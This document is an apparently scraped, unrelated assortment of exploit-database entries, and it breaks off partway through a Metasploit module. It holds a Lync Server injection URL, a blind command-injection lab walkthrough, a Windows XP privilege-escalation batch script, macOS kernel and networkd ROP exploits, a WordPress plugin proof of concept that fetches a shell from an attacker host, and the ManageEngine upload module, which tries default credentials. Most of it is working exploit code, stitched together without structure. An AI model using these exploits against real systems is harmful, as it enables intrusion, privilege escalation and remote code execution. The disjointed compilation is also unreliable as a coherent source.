source: https://www.securityfocus.com/bid/48235/info
Microsoft Lync Server 2010 is prone to a remote command-injection vulnerability because it fails to properly sanitize user-supplied input.
Attackers can exploit this issue to execute arbitrary commands in the context of the application.
Microsoft Lync Server 2010 version 4.0.7577.0 is vulnerable; other versions may also be affected.
https://www.example.com/Reach/Client/WebPages/ReachJoin.aspx?xml=&&reachLocale=en-us%22;var%20xxx=%22http://www.foofus.net/~bede/foofuslogo.jpg%22;open%28xxx%29;alert%28%22error,%20please%20enable%20popups%20from%20this%20server%20and%20reload%20from%20the%20link%20you%20were%20given%22%29//
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863216663
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
En este post vamos a estar resolviendo el laboratorio de PortSwigger: “Blind OS command injection with out-of-band interaction”.
Para resolver el laboratorio tenemos que ocasionar una búsqueda DNS al servidor público de Burp Suite (burpcollaborator.net). Para ello, haremos uso de un Blind OS Command Injection que se encuentra en la función de feedback.
Como podemos observar, hay unos cuantos campos a rellenar. Por lo que vamos a rellenarlos:
Ahora, antes de enviar el feedback. Preparamos el burp suite para que reciba las peticiones:
Con esto listo, enviamos el feedback para captar la petición:
Esta es la petición que se envía al servidor cuando se envía feedback. Para tratar con ella, la enviamos al repeater pulsando Ctrl R:
Una vez en el repeater, podemos observar como una petición válida simplemente obtiene una respuesta de estado 200 y no mucho más.
Sin embargo, entre todos los parámetros que se están enviando, vamos a intentar ver si podemos ejecutar un comando en alguno de ellos, y, con ello, realizar una búsqueda DNS al servidor de burp suite:
Al realizar esta petición si actualizamos la web, nos daremos cuenta de que hemos resuelto el reto:
En este caso, sí que es cierto, que lo mejor para realizar los retos estilo «out-of-band» es contar con el Burp Suite PRO para poder hacer uso de la característica de Burp Collaborator client:
De hecho, el siguiente y último reto de OS Command Injection (al menos a fecha de enero de 2021) no se puede resolver si no es que con Burp Suite PRO 😥.
@echo off
REM
REM source: https://www.securityfocus.com/bid/48232/info
REM
REM Microsoft Windows is prone to a local privilege-escalation vulnerability.
REM
REM A local attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges.
REM Successful exploits will result in the complete compromise of affected computers.
REM Failed exploit attempts may cause a denial-of-service condition.
REM
echo [+] Microsoft WinXP sp2/sp3 local system privilege escalation exploit
start time /T > time.txt
tskill explorer
time 13:36:59 > nul
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y
cls
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y
cls
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y
cls
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y
echo [*] Backup time
time < time.txt
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <IOKit/IOKitLib.h>
int main(){
kern_return_t err;
CFMutableDictionaryRef matching = IOServiceMatching("IntelAccelerator");
if(!matching){
printf("unable to create service matching dictionary\n");
return 0;
}
io_iterator_t iterator;
err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator);
if (err != KERN_SUCCESS){
printf("no matches\n");
return 0;
}
io_service_t service = IOIteratorNext(iterator);
if (service == IO_OBJECT_NULL){
printf("unable to find service\n");
return 0;
}
printf("got service: %x\n", service);
io_connect_t conn = MACH_PORT_NULL;
err = IOServiceOpen(service, mach_task_self(), 2, &conn);
if (err != KERN_SUCCESS){
printf("unable to get user client connection\n");
return 0;
}else{
printf("got userclient connection: %x\n", conn);
}
mach_vm_address_t addr = 0x414100000000;
mach_vm_size_t size = 0x1000;
err = IOConnectMapMemory(conn, 3, mach_task_self(), &addr, &size, kIOMapAnywhere);
return 0;
}
// clang -o ig_2_3_exploit ig_2_3_exploit.c -framework IOKit -framework CoreFoundation -m32 -D_FORTIFY_SOURCE=0
// ianbeer
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>
#include <CoreFoundation/CoreFoundation.h>
#include <IOKit/IOKitLib.h>
uint64_t kernel_symbol(char* sym){
char cmd[1024];
strcpy(cmd, "nm -g /mach_kernel | grep ");
strcat(cmd, sym);
strcat(cmd, " | cut -d' ' -f1");
FILE* f = popen(cmd, "r");
char offset_str[17];
fread(offset_str, 16, 1, f);
pclose(f);
offset_str[16] = '\x00';
uint64_t offset = strtoull(offset_str, NULL, 16);
return offset;
}
uint64_t leaked_offset_in_kext(){
FILE* f = popen("nm -g /System/Library/Extensions/IONDRVSupport.kext/IONDRVSupport | grep __ZTV17IONDRVFramebuffer | cut -d' ' -f1", "r");
char offset_str[17];
fread(offset_str, 16, 1, f);
pclose(f);
offset_str[16] = '\x00';
uint64_t offset = strtoull(offset_str, NULL, 16);
offset += 0x10; //offset from symbol to leaked pointer
return offset;
}
uint64_t leak(){
io_iterator_t iter;
CFTypeRef p = IORegistryEntrySearchCFProperty(IORegistryGetRootEntry(kIOMasterPortDefault),
kIOServicePlane,
CFSTR("AAPL,iokit-ndrv"),
kCFAllocatorDefault,
kIORegistryIterateRecursively);
if (CFGetTypeID(p) != CFDataGetTypeID()){
printf("expected CFData\n");
return 1;
}
if (CFDataGetLength(p) != 8){
printf("expected 8 bytes\n");
return 1;
}
uint64_t leaked = *((uint64_t*)CFDataGetBytePtr(p));
return leaked;
}
extern CFDictionaryRef OSKextCopyLoadedKextInfo(CFArrayRef, CFArrayRef);
uint64_t kext_load_addr(char* target_name){
uint64_t addr = 0;
CFDictionaryRef kd = OSKextCopyLoadedKextInfo(NULL, NULL);
CFIndex count = CFDictionaryGetCount(kd);
void **keys;
void **values;
keys = (void **)malloc(sizeof(void *) * count);
values = (void **)malloc(sizeof(void *) * count);
CFDictionaryGetKeysAndValues(kd,
(const void **)keys,
(const void **)values);
for(CFIndex i = 0; i < count; i++){
const char *name = CFStringGetCStringPtr(CFDictionaryGetValue(values[i], CFSTR("CFBundleIdentifier")), kCFStringEncodingMacRoman);
if (strcmp(name, target_name) == 0){
CFNumberGetValue(CFDictionaryGetValue(values[i],
CFSTR("OSBundleLoadAddress")),
kCFNumberSInt64Type,
&addr);
printf("%s: 0x%016llx\n", name, addr);
break;
}
}
return addr;
}
uint64_t load_addr(){
uint64_t addr = 0;
CFDictionaryRef kd = OSKextCopyLoadedKextInfo(NULL, NULL);
CFIndex count = CFDictionaryGetCount(kd);
void **keys;
void **values;
keys = (void **)malloc(sizeof(void *) * count);
values = (void **)malloc(sizeof(void *) * count);
CFDictionaryGetKeysAndValues(kd,
(const void **)keys,
(const void **)values);
for(CFIndex i = 0; i < count; i++){
const char *name = CFStringGetCStringPtr(CFDictionaryGetValue(values[i], CFSTR("CFBundleIdentifier")), kCFStringEncodingMacRoman);
if (strcmp(name, "com.apple.iokit.IONDRVSupport") == 0){
CFNumberGetValue(CFDictionaryGetValue(values[i],
CFSTR("OSBundleLoadAddress")),
kCFNumberSInt64Type,
&addr);
printf("%s: 0x%016llx\n", name, addr);
break;
}
}
return addr;
}
uint64_t* build_vtable(uint64_t kaslr_slide, size_t* len){
uint64_t kernel_base = 0xffffff8000200000;
kernel_base += kaslr_slide;
int fd = open("/mach_kernel", O_RDONLY);
if (!fd)
return NULL;
struct stat _stat;
fstat(fd, &_stat);
size_t buf_len = _stat.st_size;
uint8_t* buf = mmap(NULL, buf_len, PROT_READ, MAP_FILE|MAP_PRIVATE, fd, 0);
if (!buf)
return NULL;
/*
this stack pivot to rax seems to be reliably present across mavericks versions:
push rax
add [rax], eax
add [rbx+0x41], bl
pop rsp
pop r14
pop r15
pop rbp
ret
*/
uint8_t pivot_gadget_bytes[] = {0x50, 0x01, 0x00, 0x00, 0x5b, 0x41, 0x5c, 0x41, 0x5e};
uint8_t* pivot_loc = memmem(buf, buf_len, pivot_gadget_bytes, sizeof(pivot_gadget_bytes));
uint64_t pivot_gadget_offset = (uint64_t)(pivot_loc - buf);
printf("offset of pivot gadget: %p\n", pivot_gadget_offset);
uint64_t pivot = kernel_base + pivot_gadget_offset;
/*
pop rdi
ret
*/
uint8_t pop_rdi_ret_gadget_bytes[] = {0x5f, 0xc3};
uint8_t* pop_rdi_ret_loc = memmem(buf, buf_len, pop_rdi_ret_gadget_bytes, sizeof(pop_rdi_ret_gadget_bytes));
uint64_t pop_rdi_ret_gadget_offset = (uint64_t)(pop_rdi_ret_loc - buf);
printf("offset of pop_rdi_ret gadget: %p\n", pop_rdi_ret_gadget_offset);
uint64_t pop_rdi_ret = kernel_base + pop_rdi_ret_gadget_offset;
/*
pop rsi
ret
*/
uint8_t pop_rsi_ret_gadget_bytes[] = {0x5e, 0xc3};
uint8_t* pop_rsi_ret_loc = memmem(buf, buf_len, pop_rsi_ret_gadget_bytes, sizeof(pop_rsi_ret_gadget_bytes));
uint64_t pop_rsi_ret_gadget_offset = (uint64_t)(pop_rsi_ret_loc - buf);
printf("offset of pop_rsi_ret gadget: %p\n", pop_rsi_ret_gadget_offset);
uint64_t pop_rsi_ret = kernel_base + pop_rsi_ret_gadget_offset;
/*
pop rdx
ret
*/
uint8_t pop_rdx_ret_gadget_bytes[] = {0x5a, 0xc3};
uint8_t* pop_rdx_ret_loc = memmem(buf, buf_len, pop_rdx_ret_gadget_bytes, sizeof(pop_rdx_ret_gadget_bytes));
uint64_t pop_rdx_ret_gadget_offset = (uint64_t)(pop_rdx_ret_loc - buf);
printf("offset of pop_rdx_ret gadget: %p\n", pop_rdx_ret_gadget_offset);
uint64_t pop_rdx_ret = kernel_base + pop_rdx_ret_gadget_offset;
munmap(buf, buf_len);
close(fd);
/*
in IOAcceleratorFamily2
two locks are held - r12 survives the pivot, this should unlock all the locks from there:
__text:0000000000006F80 lea rsi, unk_32223
__text:0000000000006F87 mov rbx, [r12+118h]
__text:0000000000006F8F mov rax, [rbx]
__text:0000000000006F92 mov rdi, rbx
__text:0000000000006F95 xor edx, edx
__text:0000000000006F97 call qword ptr [rax+858h]
__text:0000000000006F9D mov rdi, rbx ; this
__text:0000000000006FA0 call __ZN22IOGraphicsAccelerator211unlock_busyEv ; IOGraphicsAccelerator2::unlock_busy(void)
__text:0000000000006FA5 mov rdi, [rbx+88h]
__text:0000000000006FAC call _IOLockUnlock
__text:0000000000006FB1
__text:0000000000006FB1 loc_6FB1: ; CODE XREF: IOAccelContext2::clientMemoryForType(uint,uint *,IOMemoryDescriptor **)+650j
__text:0000000000006FB1 xor ecx, ecx
__text:0000000000006FB3 jmp loc_68BC
...
__text:00000000000068BC mov eax, ecx ; jumptable 00000000000067F1 default case
__text:00000000000068BE add rsp, 38h
__text:00000000000068C2 pop rbx
__text:00000000000068C3 pop r12
__text:00000000000068C5 pop r13
__text:00000000000068C7 pop r14
__text:00000000000068C9 pop r15
__text:00000000000068CB pop rbp
__text:00000000000068CC retn
*/
uint64_t unlock_locks = kext_load_addr("com.apple.iokit.IOAcceleratorFamily2") + kaslr_slide + 0x6f80;
printf("0x%016llx\n", unlock_locks);
uint64_t KUNCExecute = kernel_symbol("_KUNCExecute") + kaslr_slide;
uint64_t thread_exception_return = kernel_symbol("_thread_exception_return") + kaslr_slide;
//char* payload = "/Applications/Calculator.app/Contents/MacOS/Calculator";
char* payload = "/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal";
uint64_t rop_stack[] = {
0, //pop r14
0, //pop r15
0, //pop rbp +10
unlock_locks,
pivot, //+20 virtual call is rax+20
0, //+10
0, //+18
0,
0, //+28
0,
0, //+38
0, //pop rbx
0, //pop r12
0, //pop r13
0, //pop r14
0, //pop r15
0, //pop rbp
pop_rdi_ret,
(uint64_t)payload,
pop_rsi_ret,
0,
pop_rdx_ret,
0,
KUNCExecute,
thread_exception_return
};
uint64_t* r = malloc(sizeof(rop_stack));
memcpy(r, rop_stack, sizeof(rop_stack));
*len = sizeof(rop_stack);
return r;
}
void trigger(void* vtable, size_t vtable_len){
//need to overallocate and touch the pages since this will be the stack:
mach_vm_address_t addr = 0x41420000 - 10 * 0x1000;
mach_vm_allocate(mach_task_self(), &addr, 0x20*0x1000, 0);
memset(addr, 0, 0x20*0x1000);
memcpy((void*)0x41420000, vtable, vtable_len);
//map NULL page
vm_deallocate(mach_task_self(), 0x0, 0x1000);
addr = 0;
vm_allocate(mach_task_self(), &addr, 0x1000, 0);
char* np = 0;
for (int i = 0; i < 0x1000; i++){
np[i] = 'A';
}
volatile uint64_t* zero = 0;
*zero = 0x41420000;
//trigger vuln
CFMutableDictionaryRef matching = IOServiceMatching("IntelAccelerator");
io_iterator_t iterator;
kern_return_t err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator);
io_service_t service = IOIteratorNext(iterator);
io_connect_t conn = MACH_PORT_NULL;
err = IOServiceOpen(service, mach_task_self(), 2, &conn);
addr = 0x12345000;
mach_vm_size_t size = 0x1000;
err = IOConnectMapMemory(conn, 3, mach_task_self(), &addr, &size, kIOMapAnywhere);
}
int main() {
uint64_t leaked_ptr = leak();
uint64_t kext_load_addr = load_addr();
// get the offset of that pointer in the kext:
uint64_t offset = leaked_offset_in_kext();
// sanity check the leaked address against the symbol addr:
if ( (leaked_ptr & 0xfff) != (offset & 0xfff) ){
printf("the leaked pointer doesn't match up with the expected symbol offset\n");
return 1;
}
uint64_t kaslr_slide = (leaked_ptr - offset) - kext_load_addr;
printf("kaslr slide: %p\n", kaslr_slide);
size_t vtable_len = 0;
void* vtable = build_vtable(kaslr_slide, &vtable_len);
trigger(vtable, vtable_len);
return 0;
}
// Requires Lorgnette: https://github.com/rodionovd/liblorgnette
// clang -o networkd_exploit networkd_exploit.c liblorgnette/lorgnette.c -framework CoreFoundation
// ianbeer
#include <dlfcn.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <xpc/xpc.h>
#include <CoreFoundation/CoreFoundation.h>
#include <mach/mach.h>
#include <mach/mach_vm.h>
#include <mach/task.h>
#include <mach-o/dyld_images.h>
#include "liblorgnette/lorgnette.h"
/* find the base address of CoreFoundation for the ROP gadgets */
void* find_library_load_address(const char* library_name){
kern_return_t err;
// get the list of all loaded modules from dyld
// the task_info mach API will get the address of the dyld all_image_info struct for the given task
// from which we can get the names and load addresses of all modules
task_dyld_info_data_t task_dyld_info;
mach_msg_type_number_t count = TASK_DYLD_INFO_COUNT;
err = task_info(mach_task_self(), TASK_DYLD_INFO, (task_info_t)&task_dyld_info, &count);
const struct dyld_all_image_infos* all_image_infos = (const struct dyld_all_image_infos*)task_dyld_info.all_image_info_addr;
const struct dyld_image_info* image_infos = all_image_infos->infoArray;
for(size_t i = 0; i < all_image_infos->infoArrayCount; i++){
const char* image_name = image_infos[i].imageFilePath;
mach_vm_address_t image_load_address = (mach_vm_address_t)image_infos[i].imageLoadAddress;
if (strstr(image_name, library_name)){
return (void*)image_load_address;
}
}
return NULL;
}
struct heap_spray {
void* fake_objc_class_ptr; // -------+
uint8_t pad0[0x10]; // |
uint64_t first_gadget; // |
uint8_t pad1[0x8]; // |
uint64_t null0; // |
uint64_t pad3; // |
uint64_t pop_rdi_rbp_ret; // |
uint64_t rdi; // |
uint64_t rbp; // |
uint64_t system; // |
struct fake_objc_class_t { // |
char pad[0x10]; // <----------+
void* cache_buckets_ptr; //--------+
uint64_t cache_bucket_mask; // |
} fake_objc_class; // |
struct fake_cache_bucket_t { // |
void* cached_sel; // <--------+ //point to the right selector
void* cached_function; // will be RIP :)
} fake_cache_bucket;
char command[256];
};
xpc_connection_t connect(){
xpc_connection_t conn = xpc_connection_create_mach_service("com.apple.networkd", NULL, XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);
xpc_connection_set_event_handler(conn, ^(xpc_object_t event) {
xpc_type_t t = xpc_get_type(event);
if (t == XPC_TYPE_ERROR){
printf("err: %s\n", xpc_dictionary_get_string(event, XPC_ERROR_KEY_DESCRIPTION));
}
printf("received an event\n");
});
xpc_connection_resume(conn);
return conn;
}
void go(){
void* heap_spray_target_addr = (void*)0x120202000;
struct heap_spray* hs = mmap(heap_spray_target_addr, 0x1000, 3, MAP_ANON|MAP_PRIVATE|MAP_FIXED, 0, 0);
memset(hs, 'C', 0x1000);
hs->null0 = 0;
hs->fake_objc_class_ptr = &hs->fake_objc_class;
hs->fake_objc_class.cache_buckets_ptr = &hs->fake_cache_bucket;
hs->fake_objc_class.cache_bucket_mask = 0;
// nasty hack to find the correct selector address :)
uint8_t* ptr = (uint8_t*)lorgnette_lookup(mach_task_self(), "_dispatch_objc_release");
uint64_t* msgrefs = ptr + 0x1a + (*(int32_t*)(ptr+0x16)); //offset of rip-relative offset of selector
uint64_t sel = msgrefs[1];
printf("%p\n", sel);
hs->fake_cache_bucket.cached_sel = sel;
uint8_t* CoreFoundation_base = find_library_load_address("CoreFoundation");
// pivot:
/*
push rax
add eax, [rax]
add [rbx+0x41], bl
pop rsp
pop r14
pop r15
pop rbp
ret
*/
hs->fake_cache_bucket.cached_function = CoreFoundation_base + 0x46ef0; //0x414142424343; // ROP from here
// jump over the NULL then so there's more space:
//pop, pop, pop, ret: //and keep stack correctly aligned
hs->first_gadget = CoreFoundation_base + 0x46ef7;
hs->pop_rdi_rbp_ret = CoreFoundation_base + 0x2226;
hs->system = dlsym(RTLD_DEFAULT, "system");
hs->rdi = &hs->command;
strcpy(hs->command, "touch /tmp/hello_networkd");
size_t heap_spray_pages = 0x40000;
size_t heap_spray_bytes = heap_spray_pages * 0x1000;
char* heap_spray_copies = malloc(heap_spray_bytes);
for (int i = 0; i < heap_spray_pages; i++){
memcpy(heap_spray_copies+(i*0x1000), hs, 0x1000);
}
xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0);
xpc_dictionary_set_data(msg, "heap_spray", heap_spray_copies, heap_spray_bytes);
xpc_dictionary_set_uint64(msg, "type", 6);
xpc_dictionary_set_uint64(msg, "connection_id", 1);
xpc_object_t params = xpc_dictionary_create(NULL, NULL, 0);
xpc_object_t conn_list = xpc_array_create(NULL, 0);
xpc_object_t arr_dict = xpc_dictionary_create(NULL, NULL, 0);
xpc_dictionary_set_string(arr_dict, "hostname", "example.com");
xpc_array_append_value(conn_list, arr_dict);
xpc_dictionary_set_value(params, "connection_entry_list", conn_list);
char* long_key = malloc(1024);
memset(long_key, 'A', 1023);
long_key[1023] = '\x00';
xpc_dictionary_set_string(params, long_key, "something or other that's not important");
uint64_t uuid[] = {0, 0x120200000};
xpc_dictionary_set_uuid(params, "effective_audit_token", (const unsigned char*)uuid);
xpc_dictionary_set_uint64(params, "start", 0);
xpc_dictionary_set_uint64(params, "duration", 0);
xpc_dictionary_set_value(msg, "parameters", params);
xpc_object_t state = xpc_dictionary_create(NULL, NULL, 0);
xpc_dictionary_set_int64(state, "power_slot", 0);
xpc_dictionary_set_value(msg, "state", state);
xpc_object_t conn = connect();
printf("connected\n");
xpc_connection_send_message(conn, msg);
printf("enqueued message\n");
xpc_connection_send_barrier(conn, ^{printf("other side has enqueued this message\n");});
xpc_release(msg);
}
int main(){
go();
printf("entering CFRunLoop\n");
for(;;){
CFRunLoopRunInMode(kCFRunLoopDefaultMode, DBL_MAX, TRUE);
}
return 0;
}
Mogwai Security Advisory MSA-2015-01
----------------------------------------------------------------------
Title: WP Pixarbay Images Multiple Vulnerabilities
Product: Pixarbay Images (Wordpress Plugin)
Affected versions: 2.3
Impact: high
Remote: yes
Product link: https://wordpress.org/plugins/pixabay-images/
Reported: 14/01/2015
by: Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench)
Vendor's Description of the Software:
----------------------------------------------------------------------
Pixabay Images is a WordPress plugin that let's you pick CC0 public
domain pictures from Pixabay and insert them with just a click anywhere
on your blog. The images are safe to use, and paying attribution or
linking back to the source is not required.
Business recommendation:
----------------------------------------------------------------------
Update to version 2.4
Vulnerability description:
----------------------------------------------------------------------
1) Authentication bypass
The plugin does not correctly check if the user is logged in. Certain
code can be called without authentication
2) Arbitrary file upload
The plugin code does not validate the host in the provided download URL,
which allows to upload malicious files, including PHP code.
3) Path Traversal
Certain values are not sanitized before they are used in a file operation.
This allows to store files outside of the "download" folder.
4) Cross Site Scripting (XSS)
The generated author link uses unsanitized user values which can be
abused for Cross Site Scripting (XSS) attacks.
Proof of concept:
----------------------------------------------------------------------
The following PoC Python script can be used to download PHP files from
a attacker controlled host.
#!/usr/bin/env python
import argparse
import httplib, urllib
from urlparse import urlparse
def exploit(target_url, shellcode_url):
target = urlparse(target_url)
params = urllib.urlencode({'pixabay_upload': 1, 'image_url': shellcode_url,
'image_user': 'none', 'q':'xxx/../../../../../../mogwai'})
headers = headers = {"Content-type": "application/x-www-form-urlencoded"}
print "[+] Sending download request...."
conn = httplib.HTTPConnection(target.netloc)
conn.request("POST", target.path + "/wp-admin/", params, headers)
response = conn.getresponse()
response_data = response.read()
if response.status != 200 and response_data != "Error: File attachment metadata
error":
print "[-] Something went wrong"
print response_data
exit()
conn.close()
# ---- Main code ----------------
parser = argparse.ArgumentParser()
parser.add_argument("target_url", help="The target url, for example
http://foo.bar/blog/")
parser.add_argument("shellcode_url", help="The url of the PHP file that should
be uploaded, for example: http://attacker.com/shell.php")
print "----------------------------------------------"
print " pixabay upload wordpress plugin exploit PoC"
print " Mogwai security"
print "----------------------------------------------"
arguments = parser.parse_args()
exploit(arguments.target_url, arguments.shellcode_url)
Vulnerable / tested versions:
----------------------------------------------------------------------
Pixabay Images 2.3
Disclosure timeline:
----------------------------------------------------------------------
14/01/2014: Reporting issues to the plugin author
15/01/2014: Release of fixed version (2.4)
19/01/2014: Public advisory
Advisory URL:
----------------------------------------------------------------------
https://www.mogwaisecurity.de/#lab
----------------------------------------------------------------------
Mogwai, IT-Sicherheitsberatung Muench
Steinhoevelstrasse 2/2
89075 Ulm (Germany)
info@mogwaisecurity.de
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'ManageEngine Multiple Products Authenticated File Upload',
'Description' => %q{
This module exploits a directory traversal vulnerability in ManageEngine ServiceDesk,
AssetExplorer, SupportCenter and IT360 when uploading attachment files. The JSP that accepts
the upload does not handle correctly '../' sequences, which can be abused to write
in the file system. Authentication is needed to exploit this vulnerability, but this module
will attempt to login using the default credentials for the administrator and guest
accounts. Alternatively you can provide a pre-authenticated cookie or a username / password
combo. For IT360 targets enter the RPORT of the ServiceDesk instance (usually 8400). All
versions of ServiceDesk prior v9 build 9031 (including MSP but excluding v4), AssetExplorer,
SupportCenter and IT360 (including MSP) are vulnerable. At the time of release of this
module, only ServiceDesk v9 has been fixed in build 9031 and above. This module has been
been tested successfully in Windows and Linux on several versions.
},
'Author' =>
[
'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability Discovery and Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2014-5301'],
['OSVDB', '116733'],
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_sd_file_upload.txt'],
['URL', 'http://seclists.org/fulldisclosure/2015/Jan/5']
],
'DefaultOptions' => { 'WfsDelay' => 30 },
'Privileged' => false, # Privileged on Windows but not on Linux targets
'Platform' => 'java',
'Arch' => ARCH_JAVA,
'Targets' =>
[
[ 'Automatic', { } ],
[ 'ServiceDesk Plus v5-v7.1 < b7016/AssetExplorer v4/SupportCenter v5-v7.9',
{
'attachment_path' => '/workorder/Attachment.jsp'
}
],
[ 'ServiceDesk Plus/Plus MSP v7.1 >= b7016 - v9.0 < b9031/AssetExplorer v5-v6.1',
{
'attachment_path' => '/common/FileAttachment.jsp'
}
],
[ 'IT360 v8-v10.4',
{
'attachment_path' => '/common/FileAttachment.jsp'
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 15 2014'))
register_options(
[
Opt::RPORT(8080),
OptString.new('JSESSIONID',
[false, 'Pre-authenticated JSESSIONID cookie (non-IT360 targets)']),
OptString.new('IAMAGENTTICKET',
[false, 'Pre-authenticated IAMAGENTTICKET cookie (IT360 target only)']),
OptString.new('USERNAME',
[true, 'The username to login as', 'guest']),
OptString.new('PASSWORD',
[true, 'Password for the specified username', 'guest']),
OptString.new('DOMAIN_NAME',
[false, 'Name of the domain to logon to'])
], self.class)
end
def get_version
res = send_request_cgi({
'uri' => '/',
'method' => 'GET'
})
# Major version, minor version, build and product (sd = servicedesk; ae = assetexplorer; sc = supportcenterl; it = it360)
version = [ 9999, 9999, 0, 'sd' ]
if res && res.code == 200
if res.body.to_s =~ /ManageEngine ServiceDesk/
if res.body.to_s =~ / \| ([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)/
output = $1
version = [output[0].to_i, output[2].to_i, '0', 'sd']
end
if res.body.to_s =~ /src='\/scripts\/Login\.js\?([0-9]+)'><\/script>/ # newer builds
version[2] = $1.to_i
elsif res.body.to_s =~ /'\/style\/style\.css', '([0-9]+)'\);<\/script>/ # older builds
version[2] = $1.to_i
end
elsif res.body.to_s =~ /ManageEngine AssetExplorer/
if res.body.to_s =~ /ManageEngine AssetExplorer ([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)/ ||
res.body.to_s =~ /<div class="login-versioninfo">version ([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)<\/div>/
output = $1
version = [output[0].to_i, output[2].to_i, 0, 'ae']
end
if res.body.to_s =~ /src="\/scripts\/ClientLogger\.js\?([0-9]+)"><\/script>/
version[2] = $1.to_i
end
elsif res.body.to_s =~ /ManageEngine SupportCenter Plus/
# All of the vulnerable sc installations are "old style", so we don't care about the major / minor version
version[3] = 'sc'
if res.body.to_s =~ /'\/style\/style\.css', '([0-9]+)'\);<\/script>/
# ... but get the build number if we can find it
version[2] = $1.to_i
end
elsif res.body.to_s =~ /\/console\/ConsoleMain\.cc/
# IT360 newer versions
version[3] = 'it'
end
elsif res && res.code == 302 && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})/
# IT360 older versions, not a very good detection string but there is no alternative?
version[3] = 'it'
end
version
end
def check
version = get_version
# TODO: put fixed version on the two ifs below once (if...) products are fixed
# sd was fixed on build 9031
# ae and sc still not fixed
if (version[0] <= 9 && version[0] > 4 && version[2] < 9031 && version[3] == 'sd') ||
(version[0] <= 6 && version[2] < 99999 && version[3] == 'ae') ||
(version[3] == 'sc' && version[2] < 99999)
return Exploit::CheckCode::Appears
end
if (version[2] > 9030 && version[3] == 'sd') ||
(version[2] > 99999 && version[3] == 'ae') ||
(version[2] > 99999 && version[3] == 'sc')
return Exploit::CheckCode::Safe
else
# An IT360 check always lands here, there is no way to get the version easily
return Exploit::CheckCode::Unknown
end
end
def authenticate_it360(port, path, username, password)
if datastore['DOMAIN_NAME'] == nil
vars_post = {
'LOGIN_ID' => username,
'PASSWORD' => password,
'isADEnabled' => 'false'
}
else
vars_post = {
'LOGIN_ID' => username,
'PASSWORD' => password,
'isADEnabled' => 'true',
'domainName' => datastore['DOMAIN_NAME']
}
end
res = send_request_cgi({
'rport' => port,
'method' => 'POST',
'uri' => normalize_uri(path),
'vars_get' => {
'service' => 'ServiceDesk',
'furl' => '/',
'timestamp' => Time.now.to_i
},
'vars_post' => vars_post
})
if res && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/
# /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/ -> this pattern is to avoid matching "removed"
return res.get_cookies
else
return nil
end
end
def get_it360_cookie_name
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri("/")
})
cookie = res.get_cookies
if cookie =~ /IAMAGENTTICKET([A-Z]{0,4})/
return $1
else
return nil
end
end
def login_it360
# Do we already have a valid cookie? If yes, just return that.
if datastore['IAMAGENTTICKET']
cookie_name = get_it360_cookie_name
cookie = 'IAMAGENTTICKET' + cookie_name + '=' + datastore['IAMAGENTTICKET'] + ';'
return cookie
end
# get the correct path, host and port
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri('/')
})
if res && res.redirect?
uri = [ res.redirection.port, res.redirection.path ]
else
return nil
end
cookie = authenticate_it360(uri[0], uri[1], datastore['USERNAME'], datastore['PASSWORD'])
if cookie != nil
return cookie
elsif datastore['USERNAME'] == 'guest' && datastore['JSESSIONID'] == nil
# we've tried with the default guest password, now let's try with the default admin password
cookie = authenticate_it360(uri[0], uri[1], 'administrator', 'administrator')
if cookie != nil
return cookie
else
# Try one more time with the default admin login for some versions
cookie = authenticate_it360(uri[0], uri[1], 'admin', 'admin')
if cookie != nil
return cookie
end
end
end
nil
end
#
# Authenticate and validate our session cookie. We need to submit credentials to
# j_security_check and then follow the redirect to HomePage.do to create a valid
# authenticated session.
#
def authenticate(cookie, username, password)
res = send_request_cgi!({
'method' => 'POST',
'uri' => normalize_uri('/j_security_check;' + cookie.to_s.gsub(';', '')),
'ctype' => 'application/x-www-form-urlencoded',
'cookie' => cookie,
'vars_post' => {
'j_username' => username,
'j_password' => password,
'logonDomainName' => datastore['DOMAIN_NAME']
}
})
if res && (res.code == 302 || (res.code == 200 && res.body.to_s =~ /redirectTo="\+'HomePage\.do';/))
# sd and ae respond with 302 while sc responds with a 200
return true
else
return false
end
end
def login
# Do we already have a valid cookie? If yes, just return that.
if datastore['JSESSIONID'] != nil
cookie = 'JSESSIONID=' + datastore['JSESSIONID'].to_s + ';'
return cookie
end
